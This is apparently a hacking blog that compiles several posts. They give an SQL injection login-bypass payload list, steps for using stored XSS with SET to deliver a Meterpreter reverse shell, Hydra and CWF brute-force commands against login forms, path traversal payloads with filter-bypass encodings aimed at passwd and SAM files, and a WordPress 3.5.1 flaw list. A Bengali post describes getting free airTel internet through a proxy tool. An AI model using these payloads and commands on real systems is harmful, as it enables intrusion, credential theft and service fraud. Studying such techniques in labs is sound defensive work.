Saturday, March 1, 2014

Sql Injection Authentication bypass cheat sheet

 Sql Injection Authentication bypass cheat sheet


This list can be used by Hackers when testing for SQL injection authentication bypass.A Hacker can use it manually or through burp in order to automate the process.If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.


or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

How to exploit stored xss using S.E.T?

  How to exploit stored xss using S.E.T?
 
 
Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS.

(1)First I recommended you to view “How to fiind xss in website?” here.

(2)Open terminal & type following code in terminal.
sudo bash
cd /opt/set
./set
(3)Now select option 1 which is Social-Engineering Attacks.
(4)Select option 2 which is website attack vector.
(5)Select option 3which is Java Applet Attack Method.
(6)Select option 1 web -templetes.
(7)Select option 1 java Required.
(8)Now we will select payload & encoder. So we select simple Windows Reverse_TCP Meterpreter & shikata_ga_nai encoding.
(9)Put listener port:443 . Now metasploit will open.
(10)Now we can go back to the web application and we can try to insert the malicious JavaScript code in the comment field that we already know from before that is vulnerable to XSS.

Web application and audit framework

  Web application and audit framework




What is BRUTE-FORCE attack ?

A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.

How to install THC-hydra ?

Open your terminal & type following command

(1)sudo bash

(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

(3)After downloading ,we are going to extract it

tar -xvf hydra-6.3-src.tar.gz

(4)tar -xvf hydra-6.3-src.tar.gz

(5)./configure && make && install

(6)make install


How to use THC-hydra?

If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21)

Now in order to brute-force a specific login form you need to define the user-name (if you don't know it include a file containing some), the word-lists directory, the service attacking and form method and the page itself.

Type following command in terminal

./hydra -l admin -P /root/Words.txt site.com http-post-form "/login.php&username=^USER^&password=^PASS^"

The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you don't know the login).

The -p switch defines the password and the capital -P - the directory for the wordlists ( the -P is used almost always)

If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp".

Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the code.

They could be usr,pwd etc - it's not necessarily for them to be as in most cases "username" & "password". Just view the source and make sure what their names are.

Now there are a lot more options of Hydra. I'll explain some of them below no matter that they are included in the MAN page of hydra

-vV - The verbose mode. This mode shows you every login attempt hydra tries.

-s - We specify the port on which we're running our attack.

-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.

-R - Restores a previously aborted session of an attack.

-e ns - Checks for blank or no password fields.

Path traversal vulnerabilities Tutorial

  Path traversal vulnerabilities Tutorial


Path traversal vulnerabilities arise when user-controllable data is used by the application to access files and directories on the application server or other back-end file system in an unsafe way. By submitting crafted input, an attacker Exploiting Path Traversal may be able to cause arbitrary content to be read from, or written to, anywhere on the file system being accessed. This often enables an attacker to read sensitive information from the server, or overwrite sensitive files, leading ultimately to arbitrary command execution on the server.

Consider the following example, in which an application uses a dynamic page to return static images to the client. The name of the requested image is specified in a query string parameter:

https://wahh-app.com/scripts/GetImage.aspx?file=diagram1.jpg

When the server processes this request, it performs the following steps:

1. Extracts the value of the file parameter from the query string.

2. Appends this value to the prefix C:\wahh-app\images\.

3. Opens the file with this name.

4. Reads the file’s contents and returns it to the client.

The vulnerability arises because an attacker can place path traversal

sequences into the file name in order to backtrack up from the image directory specified in step 2 and so access files from anywhere on the server. The path traversal sequence is known as “dot-dot-slash,” and a typical attack would look like this:

https://wahh-app.com/scripts/GetImage.aspx?file=..\..\windows\repair\sam

When the application appends the value of the file parameter to the name of the images directory, it obtains the following path:

C:\wahh-app\images\..\..\winnt\repair\sam

The two traversal sequences effectively step back up from the images directory to the root of the C: drive, and so the preceding path is equivalent to this: C:\winnt\repair\sam

Hence, instead of returning an image file, the server actually returns the repair copy of the Windows SAM file. This file may be analyzed by the attacker to obtain usernames and passwords for the server operating system.

In this simple example, the application implements no defenses to prevent path traversal attacks. However, because these attacks have been widely known about for some time, it is common to encounter applications that implement various defenses against them, often based on input validation filters. As you will see, these filters are often poorly designed and can be bypassed by a skilled attacker.

How to Bypassing Filter to Traversal Attacks ?

Bypassing Filter to Traversal Attacks

If your initial attempts to perform a traversal attack, as described previously, are unsuccessful, this does not mean that the application is not vulnerable. Many application developers are aware of path traversal vulnerabilities and implement various kinds of input validation checks in an attempt to prevent them. However, those defenses are often flawed and can be bypassed by a skilled attacker.

The first type of input filter commonly encountered involves checking

whether the filename parameter contains any path traversal sequences, and if so, either rejects the request or attempts to sanitize the input to remove the sequences. This type of filter is often vulnerable to various attacks that use alternative encodings and other tricks to defeat the filter. These attacks all exploit the type of canonicalization problems faced by input validation mechanisms

Always try path traversal sequences using both forward slashes and

backslashes. Many input filters check for only one of these, when the file system may support both.

Try simple URL-encoded representations of traversal sequences, using

the following encodings. Be sure to encode every single slash and dot

within your input:

dot                            %2e

forward slash           %2f

backslash                  %5c 

Try using 16-bit Unicode–encoding:


dot                           %u002e

forward slash          %u2215

backslash                %u2216

Try double URL–encoding:


dot                        %252e

forward slash         %252f

backslash                %255c

Try overlong UTF-8 Unicode–encoding:


dot                        %c0%2e       %e0%40%ae    %c0ae etc.

forward slash        %c0%af       %e0%80%af      %c0%2f etc.

backslash              %c0%5c       %c0%80%5c      etc.

You can use the illegal Unicode payload type within Burp Intruder to generate a huge number of alternate representations of any given character, and submit this at the relevant place within your target parameter. These are representations that strictly violate the rules for Unicode representation but are nevertheless accepted by many implementations of Unicode decoders, particularly on the Windows platform.

If the application is attempting to sanitize user input by removing traversal sequences, and does not apply this filter recursively, then it may be possible to bypass the filter by placing one sequence within another. For example:

....//

....\/

..../\

....\\

The second type of input filter commonly encountered in defenses against path traversal attacks involves verifying whether the user-supplied filename contains a suffix (i.e., file type) or prefix (i.e., starting directory) that the application is expecting.

Some applications check whether the user-supplied file name ends in a

particular file type or set of file types, and reject attempts to access anything else. Sometimes this check can be subverted by placing a URL encoded null byte at the end of your requested filename, followed by a file type that the application accepts.

For example:


../../../../../boot.ini.jpg

The reason this attack sometimes succeeds is that the file type check

is implemented using an API in a managed execution environment

in which strings are permitted to contain null characters (such as

String.endsWith() in Java). However, when the file is actually retrieved, the application ultimately uses an API in an unmanaged environment in which strings are null-terminated and so your file name is effectively truncated to your desired value.

A different attack against file type filtering is to use a URL-encoded newline character. Some methods of file retrieval (usually on Unix-based platforms) may effectively truncate your file name when a newline is encountered:

../../../../../etc/passwd%0a.jpg

Some applications attempt to control the file type being accessed by

appending their own file type suffix to the filename supplied by the user. In this situation, either of the preceding exploits may be effective, for the same reasons.

Some applications check whether the user-supplied file name starts with a particular subdirectory of the start directory, or even a specific file name. This check can of course be trivially bypassed as follows:

wahh-app/images/../../../../../../../etc/passwd

If none of the preceding attacks against input filters are successful individually, it may be that the application is implementing multiple types of filters, and so you need to combine several of these attacks simultaneously (both against traversal sequence filters and file type or directory filters). If possible, the best approach here is to try to break the problem down into separate stages. For example, if the request for

diagram1.jpg

is successful, but the request for

foo/../diagram1.jpg

fails, then try all of the possible traversal sequence bypasses until a variation on the second request is successful. If these successful traversal sequence bypasses don’t enable you to access /etc/passwd, probe whether any file type filtering is implemented and can be bypassed, by requesting

diagram1.jpg.jpg

Working entirely within the start directory defined by the application, try to probe to understand all of the filters being implemented, and see whether each can be bypassed individually with the techniques described.

Of course, if you have white box access to the application, then your task is much easier, because you can systematically work through different types of input and verify conclusively what filename (if any) is actually reaching the file system.

 

How to Solve problem of wpscan in Backtrack 5 r3?

 

Wpscan is wordpress security scanner, which is pre-installed in backtrack 5 , but it`s outdated version, so when you tried to update it, you may  have face some problems. Here is solution which work for me.
cd /pentest/web
rm -rf wpscan
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev
gem install  bundler
bundle install
ruby ./wpscan.rb

 

How to exploit Directory traversal vulnerability?

 How to exploit Directory traversal vulnerability?

Backtrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerability in web-application. Previously i post about what is directory traversal & how to bypass its filter , but that process is manual, it can consume lots of time.But in bactrack automatic tools are available for this test which is DOTDOTPWN.

If you are on other distro , then you can download it form here.

It's a very flexible intelligent fuzzer to discover traversal 
directory vulnerabilities in software such as HTTP/FTP/TFTP 
servers, Web platforms such as CMSs, ERPs, Blogs, etc. 

Also, it has a protocol-independent module to send the desired 
payload to the host and port specified. On the other hand, it 
also could be used in a scripting way using the STDOUT module.

It's written in perl programming language and can be run 
either under *NIX or Windows platforms. It's the first Mexican 
tool included in BackTrack Linux (BT4 R2).

Fuzzing modules supported in this version: 
- HTTP
- HTTP URL
- FTP
- TFTP
- Payload (Protocol independent)
- STDOUT

website hack _ Hacking & Tricks word-press


List of vulnerability in word-press 3.5.1

 
Recently true-caller and Tango messenger is hacked by Syrian-Electronic-Army.
And large amount of Database has been stolen. Now what is common in these sites?
They have word-press 3.5.1 which is vulnerable to some attack.
A weakness and multiple vulnerabilities have been reported in WordPress, which can be exploited by malicious users to disclose certain system information and bypass certain security restrictions and by malicious people to conduct spoofing and cross-site scripting attacks, bypass certain security restrictions, and cause a DoS (Denial of Service).

1) An error when calculating the hash cycle count within the "crypt_private()" method in /wp-includes/class-phpass.php can be exploited to exhaust CPU and memory resources by sending HTTP requests with a specially crafted password cookie.

Successful exploitation of this vulnerability requires knowledge of the URL for a password-protected post.

This vulnerability is confirmed in version 3.5.1. Prior versions may also be affected.



Here is full details & exploitation is available ;visit this link.Click 
 
 
2) An unspecified error within the HTTP API related to server-side requests can be exploited to gain access to the site.
Here is full details.Click
 
 
3) An unspecified error can be exploited to bypass certain restrictions when publishing posts.
 
Successful exploitation requires the "Contributor" role.

4) An unspecified error can be exploited to reassign the post authorship.

5) Certain input related to SWFUpload is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

ওয়ার্ডপ্রেসে দিয়ে তৈরি করুন ফেইসবুকেরমত সোস্যল নেটওয়ার্কিং সাইট।


ওয়ার্ডপ্রেসে দিয়ে তৈরি করুন আপনার
এলাকা ভিত্তিক বা স্কুল , সংগঠন বা গ্রুপ
ভিত্তিক সাইট । আমরা ফেইসবুকে দেখি মতের অমিল
হলেই বল্ক ব্যবহার চলে । আপনার কষ্টের
লেখা রিপোর্ট করে রিমুভ করা নাই । এবার
আপনি নিজেই তৈরি করুন সোস্যল সাইট
যেখানে আপনি হবেন কর্তৃপক্ষ বা মডারেটর ।                                      


যেখানে প্রবেশ অধিকার থাকবে শুধু আপনার
ভক্তের বা আপনার এলাকার ছেলে বা আপনার
সংগঠনের ই কেউ । তাহলে চলুন শুরু করি । এর জন্য
প্রথমেই আপনার যা যা লাগবে তার মধ্যে হল
একটা ইন্সটলেড ওয়ার্ডপ্রেসে সাইট ।

ধরে নিচ্ছি আপনার করে ফেলেছেন বা আপনার
আছে । এবার BuddyPress নামের এই
প্লাগিনটি ডাউন লোড করে ফেলুন । বা আপনার
প্লাগিন অপশনে ইয়ে এড নিউ এই খানে সার্চ
অপশনে BuddyPress লিখে সার্চ দিন।

BuddyPress Download

এবার প্লাগিন একটিভ করে , setting >Buddypress
যান ।

এবার আপনি যে যে ফিচার চান সেটা একটিভ
করে দিন। আমার কথা হলে সোস্যল নেটওয়ার্কের
জন্য যা যা লাগে সব আনতে সব অপশনই একটিভ
করা ঠিক হবে ।

এবার এইখান হতে এই থিমটি ডাউনলোড করে নিন

Ibuddy themes

এইবার থিমটি একটিভ করুন । তারপর Appearance >
Theme Option যান । তারপর Advanced setting
গিয়ে দুইটি অপশনেই ঠিক চিন্হ দিয়ে সেভ করুন ।
যাতে রেজিস্টার কৃত ইউজার ছাড়া আর কেউ
মুল সাইটে প্রবেশ করতে না পারে । যেন
সাইটে প্রবেশ করতে অবশ্যই লগইন করতে হয়ে ।

এবার Pages > Add New তে যান। Name লিখুন
হোম । এবার Template হতে Home সিলেক্ট করে দিন।
এবার পাবলিস করুন ।

এবার setting >Reading যান । Front page
displays অপশনে হতে A static page (select below)
সিলেক্ট করুন । নিচে Front page: হতে হোম
পেজটি সিলেক্ট করে দিন ।

ব্যস হয়ে গেল সোস্যল নেটওয়াকিং সাইট ।
চাইলে আপনি সাইটকে আরো ডেভেলপ
করতে পারেন । ধরুন আপনার সংগঠনের ফরম
নাম্বার সব সদস্যের প্রফোইলে থাকবে এর জন্য
আপনার একটা ফিল্ড দরকার । এইটাও
আপনি কাস্টমাইজ করতে পারেন ইউজার
ফ্রোফাইল ফিল্ড হতে ।

airTel 3G unlimited free net for p.c user






আসসালামুআলাইকুম...

কেমন আছেন সবাই??

এক বেঈমান ট্রিকবিডি এর সকল ভালো ভালো পোহশ্ত গুলা রিমুভ করে দিছে তাই নতুন ভাবে পোষ্ট গুলো করতে হচ্ছে...

দয়া করে নিচের নিয়ম গুলো মানবেন...
১।কেউ কোন খারাপ ফাইল ডাওনলোড করবেন না...
২। নিজের নামে কোথাও চালাবেন না...

প্রথমেই আপনার এয়ারটেল সীমে ১ টা নেট প্যাকেজ এক্টিভ করে নিন।
আমি সাজেষ্ট করবো ৩০ টাকা দিয়ে ২০ এমবি প্যাকেজ টা নেয়ার জন্য।কারন এই প্যাকেজ এক্টিভের মাধ্যমে আপনি ১৫ দিন ফ্রী ব্যবহার করতে পারবেন।(2G user)
অথবা ৩৪ টাকা দিয়া ২০ মেগা ৩ জি প্যাক টা কিনুন...
প্যাকেজ এক্টিভ করতে ডায়াল করুন *121*7# 3G package active করলে যাদের এলাকায় ৩ জি আছে তারা ৩জি স্পিড পাবেন :D

তারপর নিচের ফাইল্টা ডাওনলোড করুন
airTel free for pc user

মডেম apn=wap দিয়ে কনফিগার করুন...





তারপর simple server .exe open করে মিনিমাইজ করে রাখুন



মজিলার Option+> advanced>settings এ গিয়ে নিচের মতো করে সেটিংস করুন
Proxy:127.0.0.1
port:8080

অন্যন্য সফটওয়্যার ও এই প্রক্সি দিয়ে কানেক্ট করতে হবে...
idm...
 কাজ শেষ এইবার আনলিমিটেড ফ্রী চালাতে থাকুন অসাম স্পিডে ...

ট্রিকবিডীতে ফেসবুকে পাবেন

Wednesday, February 26, 2014

****Brute Force Attack to Crack Website Admin Password****


Hello, Friends this is an Exclusive post of Hack w0rm by The 3XPloiters & Hack w0rm Team, really you gonna love this Post. So be ready for something new : I've already posted : Brute force attack to hack G-mail Passwords : & I got a great success in it. So now I'll show you how can you brute force Web forms & hack or (Crack) website admin password.

What is Brute Force Attack ?
                  A password attack that continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Brute force attack is commonly used to gain access to Software/Program or any Web Content, Server, Account etc.

Requirements :
Brute Force attack Tutorial :
              First of all : This is completely for Educational Purpose only, as you know that we're Ethical Hackers - we always use Penetration testing lab, to learn, Exploit, Create, Teach & Research.

1. I'm using DVWA Pen-test lab for tutorial : Suppose m user at DVWA website with the username as gordonb & Password : abc123 - & my task is to hack website admin password. & Here we go...!

2. Cool! Now Download Tamper Data Ad-don for Firefox [Download] & Start Tamper Data.

Click on Image to Enlarge it
3. Now back to Login page of DVWA & Login Username as gordonb & Password : abc123

4. Now you'll get pop-up from tamper just uncheck [Continue Tampering] Option & Click on Submit : Click on below Image to Enlarge it.

5. After submitting you'll be in your account, so now check Tamper Data click on [First Result] & copy POSTDATA value :

 Check below Image :

6. So, now we got Login Commands, Copy that POSTDATA & Save it in Notepad. & Logout - now come back again on login page and Enter Login Username : admin & Password : anything - so simply you'll not get entry into Admin account, so let's use some evil minds.

7. After entering wrong Username & Password you'll get an error message Login Failed copy that text and save it into Notepad with previous POSTDATA text.


8. It's time to Brute Force Attack & Enter's into Admin account. Finally Start Backtrack or Kali Linux. I'm using Backtrack 5

9. Start Terminal & type mkdir pentest/passwords/cwf and hit Enter.

10. Now download this small file Called CWF Web Form Bruter. and copy that complete file into root/pentest/password/cwf.


11. Again back to Terminal & type : cd /pentest/passwords/cwf Hit Enter. & ls -l again Hit Enter, Now Uncompress file by this command : tar xovfz cwf.tar.gz & Last Command : chmod 700 crack_web_form.pl.

Click on Image to Enlarge it

12. If you want to know more Information about this Cracking Application you can type ./crack_web_form.pl -help.

13. Okay, let's setup some text and Attack. - Copy below command & Enter into Same terminal & Hit Enter : [Change Green Text with your DVWA IP]
  • ./crack_web_form.pl -U admin -http "http://192.168.32.128/dvwa/login.php" -data "username=USERNAME&password=PASSWORD&Login=Login" -M "Failed Login"
14. Hit Enter & it will start Brute Force Attack : wait for some minutes and check out result, & if you'll be lucky you'll get Successful message.

Click on Image to Enlarge it
15.                                  Brute Force Attack [Success]

Click on Image to Enlarge it

Hope, you liked our post, please share it & Increase us, & always feel free to comment and let me know your problem. Stay connected with us for more Hacky, Cracky, Ethical Stuffs..!